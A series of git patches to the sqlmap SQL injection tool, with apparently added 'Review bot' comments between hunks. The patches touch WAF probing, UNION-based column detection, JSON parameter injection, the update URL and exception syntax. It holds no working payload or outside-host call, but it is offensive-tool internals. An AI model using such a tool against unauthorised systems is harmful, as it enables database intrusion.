 payload = "%d %s" % (randomInt(), IDS_WAF_CHECK_PAYLOAD)
- value = "" if not conf.parameters.get(PLACE.GET) else conf.parameters[PLACE.GET] + DEFAULT_GET_POST_DELIMITER
- value += "%s=%s" % (randomStr(), agent.addPayloadDelimiters(payload))
+ if PLACE.URI in conf.parameters:
+ place = PLACE.POST
+ value = "%s=%s" % (randomStr(), agent.addPayloadDelimiters(payload))
+ else:
+ place = PLACE.GET
+ value = "" if not conf.parameters.get(PLACE.GET) else conf.parameters[PLACE.GET] + DEFAULT_GET_POST_DELIMITER
+ value += "%s=%s" % (randomStr(), agent.addPayloadDelimiters(payload))
 pushValue(conf.timeout)
 conf.timeout = IDS_WAF_CHECK_TIMEOUT
 try:
- retVal = Request.queryPage(place=PLACE.GET, value=value, getRatioValue=True, noteResponseTime=False, silent=True)[1] < IDS_WAF_CHECK_RATIO
+ retVal = Request.queryPage(place=place, value=value, getRatioValue=True, noteResponseTime=False, silent=True)[1] < IDS_WAF_CHECK_RATIO
 except SqlmapConnectionException:
 retVal = True
 finally:
diff --git a/lib/core/settings.py b/lib/core/settings.py
index 72bbce430d9..3207eb04f77 100644
--- a/lib/core/settings.py
+++ b/lib/core/settings.py
@@ -19,7 +19,7 @@ from lib.core.enums import OS
 # sqlmap version (...)
-VERSION = "1.2.3.14"
+VERSION = "1.2.3.15"
 TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable"
 TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34}
 VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE)
diff --git a/txt/checksum.md5 b/txt/checksum.md5
index 6e21bf0e1c2..b94c0dd07ee 100644
--- a/txt/checksum.md5
+++ b/txt/checksum.md5
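Review bot: Both branches of the new `if PLACE.URI in conf.parameters` end by appending the same `"%s=%s" % (randomStr(), agent.addPayloadDelimiters(payload))` term, so the probe-building line is duplicated; initialising `value` per branch and appending once after the `if`/`else` keeps a single copy. Separately, the URI branch sends the probe as `PLACE.POST` with a body holding only the random parameter, while the GET branch prepends the target's existing GET parameters; if the target also has POST data it is presumably not carried along here, and a comment stating whether that is intended would help. `checkWaf` continues outside the hunk on both sides.
```python
    if PLACE.URI in conf.parameters:
        place = PLACE.POST
        value = ""
    else:
        place = PLACE.GET
        value = "" if not conf.parameters.get(PLACE.GET) else conf.parameters[PLACE.GET] + DEFAULT_GET_POST_DELIMITER

    value += "%s=%s" % (randomStr(), agent.addPayloadDelimiters(payload))
    # … unchanged: timeout push, queryPage call, exception handling …
```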
@@ -21,7 +21,7 @@ c88d66597f4aab719bde4542b0a1a6e0 extra/shutils/regressiontest.py 1e5532ede194ac9c083891c2f02bca93 extra/sqlharvest/__init__.py b3e60ea4e18a65c48515d04aab28ff68 extra/sqlharvest/sqlharvest.py 0f581182871148b0456a691ae85b04c0 lib/controller/action.py -5132e59761d8bb617412d2aaaf987716 lib/controller/checks.py +e8533a8a406fe58cc610337639ed4bb1 lib/controller/checks.py 9fbd66da9b5cf58bbb8474ccf9252bb7 lib/controller/controller.py a7b0c8e5a18a3abe8803999dcfc4664f lib/controller/handler.py 1e5532ede194ac9c083891c2f02bca93 lib/controller/__init__.py @@ -46,7 +46,7 @@ ffa5f01f39b17c8d73423acca6cfe86a lib/core/readlineng.py 0c3eef46bdbf87e29a3f95f90240d192 lib/core/replication.py a7db43859b61569b601b97f187dd31c5 lib/core/revision.py fcb74fcc9577523524659ec49e2e964b lib/core/session.py -b7e3ed2ba524c6b532fcc13025bd7dc3 lib/core/settings.py +32680252839964d1ff2c62207f64b3b0 lib/core/settings.py d0adc28a38e43a787df4471f7f027413 lib/core/shell.py 63491be462c515a1a3880c27c2acc4a2 lib/core/subprocessng.py 3cc852f927833895361973fbcfd156d2 lib/core/target.py From c024233f883ae04868f42c8b29c716c3ed89cf5e Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Sun, 11 Mar 2018 03:28:19 +0100 Subject: [PATCH 061/428] Minor patch --- lib/core/settings.py | 2 +- plugins/dbms/hsqldb/fingerprint.py | 2 +- txt/checksum.md5 | 4 ++-- 3 files changed, 4 insertions(+), 4 deletions(-) diff --git a/lib/core/settings.py b/lib/core/settings.py index 3207eb04f77..583844a6509 100644 --- a/lib/core/settings.py +++ b/lib/core/settings.py @@ -19,7 +19,7 @@ from lib.core.enums import OS # sqlmap version (...) -VERSION = "1.2.3.15" +VERSION = "1.2.3.16" TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable" TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34} VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE) 
diff --git a/plugins/dbms/hsqldb/fingerprint.py b/plugins/dbms/hsqldb/fingerprint.py index 33a644c3270..f6a9aa65992 100644 --- a/plugins/dbms/hsqldb/fingerprint.py +++ b/plugins/dbms/hsqldb/fingerprint.py @@ -128,7 +128,7 @@ def checkDbms(self): warnMsg = "the back-end DBMS is not %s" % DBMS.HSQLDB logger.warn(warnMsg) - dbgMsg = "...or version is < 1.7.2" % DBMS.HSQLDB + dbgMsg = "...or version is < 1.7.2" logger.debug(dbgMsg) return False diff --git a/txt/checksum.md5 b/txt/checksum.md5 index b94c0dd07ee..1dcfb076637 100644 --- a/txt/checksum.md5 +++ b/txt/checksum.md5 @@ -46,7 +46,7 @@ ffa5f01f39b17c8d73423acca6cfe86a lib/core/readlineng.py 0c3eef46bdbf87e29a3f95f90240d192 lib/core/replication.py a7db43859b61569b601b97f187dd31c5 lib/core/revision.py fcb74fcc9577523524659ec49e2e964b lib/core/session.py -32680252839964d1ff2c62207f64b3b0 lib/core/settings.py +a4f32062f445d10c9cb655595beecc78 lib/core/settings.py d0adc28a38e43a787df4471f7f027413 lib/core/shell.py 63491be462c515a1a3880c27c2acc4a2 lib/core/subprocessng.py 3cc852f927833895361973fbcfd156d2 lib/core/target.py @@ -140,7 +140,7 @@ c56f2dabe88fd761a1a9a51e4d104088 plugins/dbms/firebird/syntax.py 61225f674e64bc6eafea140c4cf93deb plugins/dbms/hsqldb/connector.py 95919592e5bb83df00b99bb9e8a70977 plugins/dbms/hsqldb/enumeration.py 616595e74ecb644271cbbd31815d92e0 plugins/dbms/hsqldb/filesystem.py -bc8bc5d69cb720fb5dc23af490c7c11c plugins/dbms/hsqldb/fingerprint.py +b7d693a6f5f39fee0a65f2d7b0830c5e plugins/dbms/hsqldb/fingerprint.py fd369161778d6b48d7f1f7fc14dcdb5c plugins/dbms/hsqldb/__init__.py 4673ebfdce9859718c19e8a7765da8d3 plugins/dbms/hsqldb/syntax.py 7c0535736215ca612756cf589adb249b plugins/dbms/hsqldb/takeover.py From cd88caa0e7f3f7e82a2124ee934cc3037e49df55 Mon Sep 17 00:00:00 2001 
From: Miroslav Stampar Date: Sun, 11 Mar 2018 03:34:31 +0100 Subject: [PATCH 062/428] Fixes #2977 --- lib/core/settings.py | 2 +- lib/techniques/union/test.py | 14 ++++++++------ txt/checksum.md5 | 4 ++-- 3 files changed, 11 insertions(+), 9 deletions(-)
diff --git a/lib/core/settings.py b/lib/core/settings.py
index 583844a6509..378052be8fd 100644
--- a/lib/core/settings.py
+++ b/lib/core/settings.py
@@ -19,7 +19,7 @@ from lib.core.enums import OS
 # sqlmap version (...)
-VERSION = "1.2.3.16"
+VERSION = "1.2.3.17"
 TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable"
 TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34}
 VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE)
diff --git a/lib/techniques/union/test.py b/lib/techniques/union/test.py
index 3d621e89860..dee45c66cb4 100644
--- a/lib/techniques/union/test.py
+++ b/lib/techniques/union/test.py
@@ -142,14 +142,16 @@ def _orderByTest(cols):
 elif abs(max_ - min_) >= MIN_STATISTICAL_RANGE:
 deviation = stdev(ratios)
- lower, upper = average(ratios) - UNION_STDEV_COEFF * deviation, average(ratios) + UNION_STDEV_COEFF * deviation
- if min_ < lower:
- retVal = minItem[0]
+ if deviation is not None:
+ lower, upper = average(ratios) - UNION_STDEV_COEFF * deviation, average(ratios) + UNION_STDEV_COEFF * deviation
- if max_ > upper:
- if retVal is None or abs(max_ - upper) > abs(min_ - lower):
- retVal = maxItem[0]
+ if min_ < lower:
+ retVal = minItem[0]
+
+ if max_ > upper:
+ if retVal is None or abs(max_ - upper) > abs(min_ - lower):
+ retVal = maxItem[0]
 finally:
 kb.errorIsNone = popValue()
diff --git a/txt/checksum.md5 b/txt/checksum.md5
index 1dcfb076637..a7c5453d10a 100644
--- a/txt/checksum.md5
+++ b/txt/checksum.md5
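Review bot: `average(ratios)` is computed twice on the added `lower, upper = ...` line, once per bound; computing it once is clearer and avoids the redundant pass, e.g. `mean = average(ratios)` followed by `lower, upper = mean - UNION_STDEV_COEFF * deviation, mean + UNION_STDEV_COEFF * deviation`. When `deviation` is `None` the whole block is now skipped and `retVal` keeps its earlier value without any trace; a debug log line noting that no deviation could be computed would make that path visible, presumably `stdev()` yields `None` for too few samples. `_orderByTest` begins and ends outside the hunk.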
@@ -46,7 +46,7 @@ ffa5f01f39b17c8d73423acca6cfe86a lib/core/readlineng.py 0c3eef46bdbf87e29a3f95f90240d192 lib/core/replication.py a7db43859b61569b601b97f187dd31c5 lib/core/revision.py fcb74fcc9577523524659ec49e2e964b lib/core/session.py -a4f32062f445d10c9cb655595beecc78 lib/core/settings.py +401efa6aae28b56f34420323ac4c2296 lib/core/settings.py d0adc28a38e43a787df4471f7f027413 lib/core/shell.py 63491be462c515a1a3880c27c2acc4a2 lib/core/subprocessng.py 3cc852f927833895361973fbcfd156d2 lib/core/target.py @@ -96,7 +96,7 @@ b84d45fc7349caa714f9769b13d70cab lib/techniques/blind/inference.py 627ddc86a5a969e5509c7531c5c27a6c lib/techniques/error/use.py 1e5532ede194ac9c083891c2f02bca93 lib/techniques/__init__.py 1e5532ede194ac9c083891c2f02bca93 lib/techniques/union/__init__.py -e58ab8029ffb2cc37e42d68747c4da39 lib/techniques/union/test.py +da5a117fb64723e6c815b0e33d50f66a lib/techniques/union/test.py ac67ebbabd06bf9853befc65ad49679e lib/techniques/union/use.py e4146464cf968d4015a52cb8c10e3da5 lib/utils/api.py 37dfb641358669f62c2acedff241348b lib/utils/brute.py From 0c4b6c9978ae01325de65bd88a3df9bd9be9d248 Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Mon, 12 Mar 2018 11:37:48 +0100 Subject: [PATCH 063/428] Fixes #2974 --- lib/core/common.py | 2 +- lib/core/settings.py | 2 +- txt/checksum.md5 | 4 ++-- 3 files changed, 4 insertions(+), 4 deletions(-) diff --git a/lib/core/common.py b/lib/core/common.py index 6b36d1ec02f..41f47398253 100644 --- a/lib/core/common.py +++ b/lib/core/common.py @@ -651,7 +651,7 @@ def walk(head, current=None): message = "it appears that provided value for %s parameter '%s' " % (place, parameter) message += "is JSON deserializable. Do you want to inject inside? [y/N] " - if not readInput(message, default='N', boolean=True): + if readInput(message, default='N', boolean=True): del testableParameters[parameter] testableParameters.update(candidates) break 
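Review bot: With the boolean now un-inverted on the `if readInput(message, default='N', boolean=True):` line, answering "y" replaces the parameter with its JSON sub-candidates and then hits `break`, so only the first JSON-deserializable parameter in a request is ever offered; if the enclosing loop (which starts outside this hunk) walks every testable parameter, `continue` would be the expected control flow. Worth confirming whether stopping after one is intended, and if so a comment such as `# only one JSON parameter is expanded per request` on the `break` would make that explicit. The inversion itself is the right fix: the old code expanded the parameter precisely when the user declined.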
diff --git a/lib/core/settings.py b/lib/core/settings.py index 378052be8fd..e58fcf907d1 100644 --- a/lib/core/settings.py +++ b/lib/core/settings.py @@ -19,7 +19,7 @@ from lib.core.enums import OS # sqlmap version (...) -VERSION = "1.2.3.17" +VERSION = "1.2.3.18" TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable" TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34} VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE) diff --git a/txt/checksum.md5 b/txt/checksum.md5 index a7c5453d10a..9921850f17f 100644 --- a/txt/checksum.md5 +++ b/txt/checksum.md5 @@ -27,7 +27,7 @@ a7b0c8e5a18a3abe8803999dcfc4664f lib/controller/handler.py 1e5532ede194ac9c083891c2f02bca93 lib/controller/__init__.py 052c368ae6ca09362a19376c8483fa85 lib/core/agent.py 86a4703d5474badd8462146510b2c460 lib/core/bigarray.py -863d9c00a7684db29005705d6dcc36b9 lib/core/common.py +80087ee0716904b24c7970beed20cf27 lib/core/common.py 2a40d5b5997265daa890545d4a4a59b9 lib/core/convert.py 9f87391b6a3395f7f50830b391264f27 lib/core/data.py 72016ea5c994a711a262fd64572a0fcd lib/core/datatype.py @@ -46,7 +46,7 @@ ffa5f01f39b17c8d73423acca6cfe86a lib/core/readlineng.py 0c3eef46bdbf87e29a3f95f90240d192 lib/core/replication.py a7db43859b61569b601b97f187dd31c5 lib/core/revision.py fcb74fcc9577523524659ec49e2e964b lib/core/session.py -401efa6aae28b56f34420323ac4c2296 lib/core/settings.py +fbcb5796a6af29fc0715fe516e38f754 lib/core/settings.py d0adc28a38e43a787df4471f7f027413 lib/core/shell.py 63491be462c515a1a3880c27c2acc4a2 lib/core/subprocessng.py 3cc852f927833895361973fbcfd156d2 lib/core/target.py From 99894dc3c1bb9563a2dd600f688f602fc5dda908 Mon Sep 17 00:00:00 2001 
From: Miroslav Stampar Date: Tue, 13 Mar 2018 10:37:13 +0100 Subject: [PATCH 064/428] Minor update (git/https repo address consistency) --- lib/core/settings.py | 4 ++-- lib/core/update.py | 4 ++-- txt/checksum.md5 | 4 ++-- 3 files changed, 6 insertions(+), 6 deletions(-)
diff --git a/lib/core/settings.py b/lib/core/settings.py
index e58fcf907d1..f1f2270c38f 100644
--- a/lib/core/settings.py
+++ b/lib/core/settings.py
@@ -19,7 +19,7 @@ from lib.core.enums import OS
 # sqlmap version (...)
-VERSION = "1.2.3.18"
+VERSION = "1.2.3.19"
 TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable"
 TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34}
 VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE)
@@ -27,7 +27,7 @@ SITE = "http://sqlmap.org"
 DEV_EMAIL_ADDRESS = "dev@sqlmap.org"
 ISSUES_PAGE = "https://github.com/sqlmapproject/sqlmap/issues/new"
-GIT_REPOSITORY = "git://github.com/sqlmapproject/sqlmap.git"
+GIT_REPOSITORY = "https://github.com/sqlmapproject/sqlmap.git"
 GIT_PAGE = "https://github.com/sqlmapproject/sqlmap"
 # colorful banner
diff --git a/lib/core/update.py b/lib/core/update.py
index a411594002e..18771bb1517 100644
--- a/lib/core/update.py
+++ b/lib/core/update.py
@@ -30,7 +30,7 @@ def update():
 if not os.path.exists(os.path.join(paths.SQLMAP_ROOT_PATH, ".git")):
 errMsg = "not a git repository. Please checkout the 'sqlmapproject/sqlmap' repository "
- errMsg += "from GitHub (e.g. 'git clone --depth 1 https://github.com/sqlmapproject/sqlmap.git sqlmap')"
+ errMsg += "from GitHub (e.g. 'git clone --depth 1 %s sqlmap')" % GIT_REPOSITORY
 logger.error(errMsg)
 else:
 infoMsg = "updating sqlmap to the latest development revision from the "
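Review bot: Switching `GIT_REPOSITORY` from `git://` to `https://` is the security-relevant part of this hunk and deserves a comment, because `git://` is unauthenticated and unencrypted and this URL is what `update()` pulls executable code from: `# keep https: update() pulls and runs code from this URL, so the transport must be authenticated`. The context line `SITE = "http://sqlmap.org"` in the same hunk stays plain http; that is fine if it is only ever displayed, but worth confirming nothing fetches from it. The commit title ("repo address consistency") undersells the change; a note in the description that the update channel is now TLS-protected would help anyone auditing the history.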
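Review bot: The replaced `errMsg +=` line now references `GIT_REPOSITORY`, and the diffstat for `lib/core/update.py` (`4 ++--`) shows no import being added, so the name must already be in scope in this module, presumably imported for the pull itself; confirm it is a plain module-level import rather than one guarded by a condition, since this is an error path that only runs when the checkout is broken. Interpolating the constant also means the clone hint tracks the https switch automatically, which is the point of the change. `update()` begins before this hunk and continues after it.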
@@ -56,7 +56,7 @@ def update(): else: if "Not a git repository" in stderr: errMsg = "not a valid git repository. Please checkout the 'sqlmapproject/sqlmap' repository " - errMsg += "from GitHub (e.g. 'git clone --depth 1 https://github.com/sqlmapproject/sqlmap.git sqlmap')" + errMsg += "from GitHub (e.g. 'git clone --depth 1 %s sqlmap')" % GIT_REPOSITORY logger.error(errMsg) else: logger.error("update could not be completed ('%s')" % re.sub(r"\W+", " ", stderr).strip()) diff --git a/txt/checksum.md5 b/txt/checksum.md5 index 9921850f17f..a5b4fcf18ea 100644 --- a/txt/checksum.md5 +++ b/txt/checksum.md5 @@ -46,14 +46,14 @@ ffa5f01f39b17c8d73423acca6cfe86a lib/core/readlineng.py 0c3eef46bdbf87e29a3f95f90240d192 lib/core/replication.py a7db43859b61569b601b97f187dd31c5 lib/core/revision.py fcb74fcc9577523524659ec49e2e964b lib/core/session.py -fbcb5796a6af29fc0715fe516e38f754 lib/core/settings.py +38ff7838ee66e799a8484f4850152cdc lib/core/settings.py d0adc28a38e43a787df4471f7f027413 lib/core/shell.py 63491be462c515a1a3880c27c2acc4a2 lib/core/subprocessng.py 3cc852f927833895361973fbcfd156d2 lib/core/target.py 72d499ca8d792e90a1ebfb2ad2341a51 lib/core/testing.py de9922a29c71a235cb95a916ff925db2 lib/core/threads.py c40758411bb0bd68764d78e0bb72bd0f lib/core/unescaper.py -063c10fb8261994fe1f8c8ace715aa76 lib/core/update.py +1b655a78fe4d937d39131938a4a5a1d6 lib/core/update.py fc624104ddb36d41794b7a943fde5f21 lib/core/wordlist.py 1e5532ede194ac9c083891c2f02bca93 lib/__init__.py 7620f1f4b8791e13c7184c06b5421754 lib/parse/banner.py From 1d9c11b1c16e7e8fccf8d414846388769c6b8648 Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Tue, 13 Mar 2018 11:03:05 +0100 Subject: [PATCH 065/428] Minor update of Travis config --- .travis.yml | 3 +++ lib/core/settings.py | 2 +- txt/checksum.md5 | 2 +- 3 files changed, 5 insertions(+), 2 deletions(-) diff --git a/.travis.yml b/.travis.yml index 7bfe0cef721..192acbf7516 100644 --- a/.travis.yml +++ b/.travis.yml 
@@ -1,4 +1,7 @@ language: python +sudo: false +git: + depth: 1 python: - "2.6" - "2.7" diff --git a/lib/core/settings.py b/lib/core/settings.py index f1f2270c38f..c51ae633ded 100644 --- a/lib/core/settings.py +++ b/lib/core/settings.py @@ -19,7 +19,7 @@ from lib.core.enums import OS # sqlmap version (...) -VERSION = "1.2.3.19" +VERSION = "1.2.3.20" TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable" TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34} VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE) diff --git a/txt/checksum.md5 b/txt/checksum.md5 index a5b4fcf18ea..6ec32bb0ab7 100644 --- a/txt/checksum.md5 +++ b/txt/checksum.md5 @@ -46,7 +46,7 @@ ffa5f01f39b17c8d73423acca6cfe86a lib/core/readlineng.py 0c3eef46bdbf87e29a3f95f90240d192 lib/core/replication.py a7db43859b61569b601b97f187dd31c5 lib/core/revision.py fcb74fcc9577523524659ec49e2e964b lib/core/session.py -38ff7838ee66e799a8484f4850152cdc lib/core/settings.py +8e9da51e9fb8e345f5a8bde0f219b696 lib/core/settings.py d0adc28a38e43a787df4471f7f027413 lib/core/shell.py 63491be462c515a1a3880c27c2acc4a2 lib/core/subprocessng.py 3cc852f927833895361973fbcfd156d2 lib/core/target.py From ae2b02952f459ccf4dd0d1280f38c7692e9d966e Mon Sep 17 00:00:00 2001 
From: Miroslav Stampar Date: Tue, 13 Mar 2018 11:13:38 +0100 Subject: [PATCH 066/428] Dealing with deprecated raises --- lib/core/bigarray.py | 6 +++--- lib/core/common.py | 20 +++++++++----------- lib/core/convert.py | 2 +- lib/core/option.py | 12 ++++++------ lib/core/settings.py | 2 +- lib/core/wordlist.py | 4 ++-- lib/parse/cmdline.py | 2 +- lib/parse/payloads.py | 4 ++-- lib/parse/sitemap.py | 2 +- lib/request/basicauthhandler.py | 6 ++---- lib/request/connect.py | 2 +- lib/utils/api.py | 2 +- lib/utils/hashdb.py | 2 +- lib/utils/sqlalchemy.py | 2 +- txt/checksum.md5 | 28 ++++++++++++++-------------- 15 files changed, 46 insertions(+), 50 deletions(-) diff --git a/lib/core/bigarray.py b/lib/core/bigarray.py index f733b81cbe5..33ebed67a64 100644 --- a/lib/core/bigarray.py +++ b/lib/core/bigarray.py @@ -90,7 +90,7 @@ def pop(self): except IOError, ex: errMsg = "exception occurred while retrieving data " errMsg += "from a temporary file ('%s')" % ex.message - raise SqlmapSystemException, errMsg + raise SqlmapSystemException(errMsg) return self.chunks[-1].pop() @@ -115,7 +115,7 @@ def _dump(self, chunk): errMsg += "make sure that there is enough disk space left. If problem persists, " errMsg += "try to set environment variable 'TEMP' to a location " errMsg += "writeable by the current user" - raise SqlmapSystemException, errMsg + raise SqlmapSystemException(errMsg) def _checkcache(self, index): if (self.cache and self.cache.index != index and self.cache.dirty): @@ -129,7 +129,7 @@ def _checkcache(self, index): except IOError, ex: errMsg = "exception occurred while retrieving data " errMsg += "from a temporary file ('%s')" % ex.message - raise SqlmapSystemException, errMsg + raise SqlmapSystemException(errMsg) def __getstate__(self): return self.chunks, self.filenames diff --git a/lib/core/common.py b/lib/core/common.py index 41f47398253..c9ad85a2545 100644 --- a/lib/core/common.py +++ b/lib/core/common.py 
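Review bot: The three bigarray hunks convert `raise X, msg` but leave `except IOError, ex:` and `ex.message` in place, and those are deprecated for the same reason (both are Python 2-only; `except IOError as ex:` is valid from 2.6 and `BaseException.message` is gone in 3). The option.py and wordlist.py hunks in this same patch already use `getSafeExString(ex)` for the message, so `errMsg += "from a temporary file ('%s')" % getSafeExString(ex)` here would keep the file consistent with the rest of the change. Whether `getSafeExString` is imported in bigarray.py is not visible in the hunk. `pop`, `_dump` and `_checkcache` all begin before their respective hunks.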
@@ -596,9 +596,7 @@ def paramToDict(place, parameters=None): testableParameters[parameter] = "=".join(parts[1:]) if not conf.multipleTargets and not (conf.csrfToken and parameter == conf.csrfToken): _ = urldecode(testableParameters[parameter], convall=True) - if (_.endswith("'") and _.count("'") == 1 - or re.search(r'\A9{3,}', _) or re.search(r'\A-\d+\Z', _) or re.search(DUMMY_USER_INJECTION, _))\ - and not parameter.upper().startswith(GOOGLE_ANALYTICS_COOKIE_PREFIX): + if (_.endswith("'") and _.count("'") == 1 or re.search(r'\A9{3,}', _) or re.search(r'\A-\d+\Z', _) or re.search(DUMMY_USER_INJECTION, _)) and not parameter.upper().startswith(GOOGLE_ANALYTICS_COOKIE_PREFIX): warnMsg = "it appears that you have provided tainted parameter values " warnMsg += "('%s') with most likely leftover " % element warnMsg += "chars/statements from manual SQL injection test(s). " @@ -1371,7 +1369,7 @@ def parseTargetDirect(): raise SqlmapSyntaxException(errMsg) if dbmsName in (DBMS.MSSQL, DBMS.SYBASE): - import _mssql + __import__("_mssql") import pymssql if not hasattr(pymssql, "__version__") or pymssql.__version__ < "1.0.2": @@ -1381,17 +1379,17 @@ def parseTargetDirect(): raise SqlmapMissingDependence(errMsg) elif dbmsName == DBMS.MYSQL: - import pymysql + __import__("pymysql") elif dbmsName == DBMS.PGSQL: - import psycopg2 + __import__("psycopg2") elif dbmsName == DBMS.ORACLE: - import cx_Oracle + __import__("cx_Oracle") elif dbmsName == DBMS.SQLITE: - import sqlite3 + __import__("sqlite3") elif dbmsName == DBMS.ACCESS: - import pyodbc + __import__("pyodbc") elif dbmsName == DBMS.FIREBIRD: - import kinterbasdb + __import__("kinterbasdb") except: if _sqlalchemy and data[3] in _sqlalchemy.dialects.__all__: pass 
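Review bot: The new `__import__("pymysql")` (and sibling) calls discard their result, which reads like a mistake unless the reader already knows these are availability probes; a comment above the first one would settle it: `# availability probes only: the modules are imported for real by the DBMS connectors, so no name is bound here`. `importlib.import_module` is the documented spelling, but it needs Python 2.7 and the .travis.yml hunk earlier in this log still lists 2.6, so `__import__` is presumably the deliberate choice and worth saying so. The bare `except:` that follows these probes is pre-existing, but it will also swallow a `KeyboardInterrupt` raised during a slow import; `except ImportError:` would be the precise catch if nothing else in the `try` is expected to fail. `parseTargetDirect` begins before this hunk.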
@@ -2005,7 +2003,7 @@ def parseXmlFile(xmlFile, handler): errMsg = "something appears to be wrong with " errMsg += "the file '%s' ('%s'). Please make " % (xmlFile, getSafeExString(ex)) errMsg += "sure that you haven't made any changes to it" - raise SqlmapInstallationException, errMsg + raise SqlmapInstallationException(errMsg) def getSQLSnippet(dbms, sfile, **variables): """ diff --git a/lib/core/convert.py b/lib/core/convert.py index 5a5701c23d1..c8ebaa0b303 100644 --- a/lib/core/convert.py +++ b/lib/core/convert.py @@ -80,7 +80,7 @@ def _(self): if len(self.stack) > 1: func = self.stack[-2] if func not in PICKLE_REDUCE_WHITELIST: - raise Exception, "abusing reduce() is bad, Mkay!" + raise Exception("abusing reduce() is bad, Mkay!") self.load_reduce() def loads(str): diff --git a/lib/core/option.py b/lib/core/option.py index 0cfc3caa19d..e4fd1764b90 100644 --- a/lib/core/option.py +++ b/lib/core/option.py @@ -337,7 +337,7 @@ def _parseBurpLog(content): if not host: errMsg = "invalid format of a request file" - raise SqlmapSyntaxException, errMsg + raise SqlmapSyntaxException(errMsg) if not url.startswith("http"): url = "%s://%s:%s%s" % (scheme or "http", host, port or "80", url) @@ -402,7 +402,7 @@ def __contains__(self, name): errMsg = "something appears to be wrong with " errMsg += "the file '%s' ('%s'). Please make " % (paths.QUERIES_XML, getSafeExString(ex)) errMsg += "sure that you haven't made any changes to it" - raise SqlmapInstallationException, errMsg + raise SqlmapInstallationException(errMsg) for node in tree.findall("*"): queries[node.attrib['value']] = iterate(node) @@ -1128,7 +1128,7 @@ def _setHTTPHandlers(): _ = urlparse.urlsplit(conf.proxy) except Exception, ex: errMsg = "invalid proxy address '%s' ('%s')" % (conf.proxy, getSafeExString(ex)) - raise SqlmapSyntaxException, errMsg + raise SqlmapSyntaxException(errMsg) hostnamePort = _.netloc.split(":") 
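Review bot: In the convert.py hunk the whitelist check runs only when `len(self.stack) > 1`; with one or zero entries the code falls through to `self.load_reduce()` unchecked. That call presumably fails on an underfull stack, but a restricted unpickler is much easier to audit when the guard fails closed: `if len(self.stack) < 2 or self.stack[-2] not in PICKLE_REDUCE_WHITELIST: raise pickle.UnpicklingError("abusing reduce() is bad, Mkay!")`. Raising `pickle.UnpicklingError` instead of a bare `Exception` also lets callers of `loads()` tell a rejected payload from an unrelated failure (this assumes `pickle` is imported in convert.py, which the hunk does not show). The enclosing method `_` begins before this hunk.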
@@ -1255,7 +1255,7 @@ def _setSafeVisit(): kb.safeReq.post = None else: errMsg = "invalid format of a safe request file" - raise SqlmapSyntaxException, errMsg + raise SqlmapSyntaxException(errMsg) else: if not re.search(r"\Ahttp[s]*://", conf.safeUrl): if ":443/" in conf.safeUrl: @@ -1580,7 +1580,7 @@ def _createTemporaryDirectory(): except (OSError, IOError), ex: errMsg = "there has been a problem while accessing " errMsg += "temporary directory location(s) ('%s')" % getSafeExString(ex) - raise SqlmapSystemException, errMsg + raise SqlmapSystemException(errMsg) else: try: if not os.path.isdir(tempfile.gettempdir()): @@ -1607,7 +1607,7 @@ def _createTemporaryDirectory(): except (OSError, IOError, WindowsError), ex: errMsg = "there has been a problem while setting " errMsg += "temporary directory location ('%s')" % getSafeExString(ex) - raise SqlmapSystemException, errMsg + raise SqlmapSystemException(errMsg) def _cleanupOptions(): """ diff --git a/lib/core/settings.py b/lib/core/settings.py index c51ae633ded..1d44c80a3e4 100644 --- a/lib/core/settings.py +++ b/lib/core/settings.py @@ -19,7 +19,7 @@ from lib.core.enums import OS # sqlmap version (...) -VERSION = "1.2.3.20" +VERSION = "1.2.3.21" TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable" TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34} VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE) diff --git a/lib/core/wordlist.py b/lib/core/wordlist.py index 90d26d4835b..77c779a270c 100644 --- a/lib/core/wordlist.py +++ b/lib/core/wordlist.py 
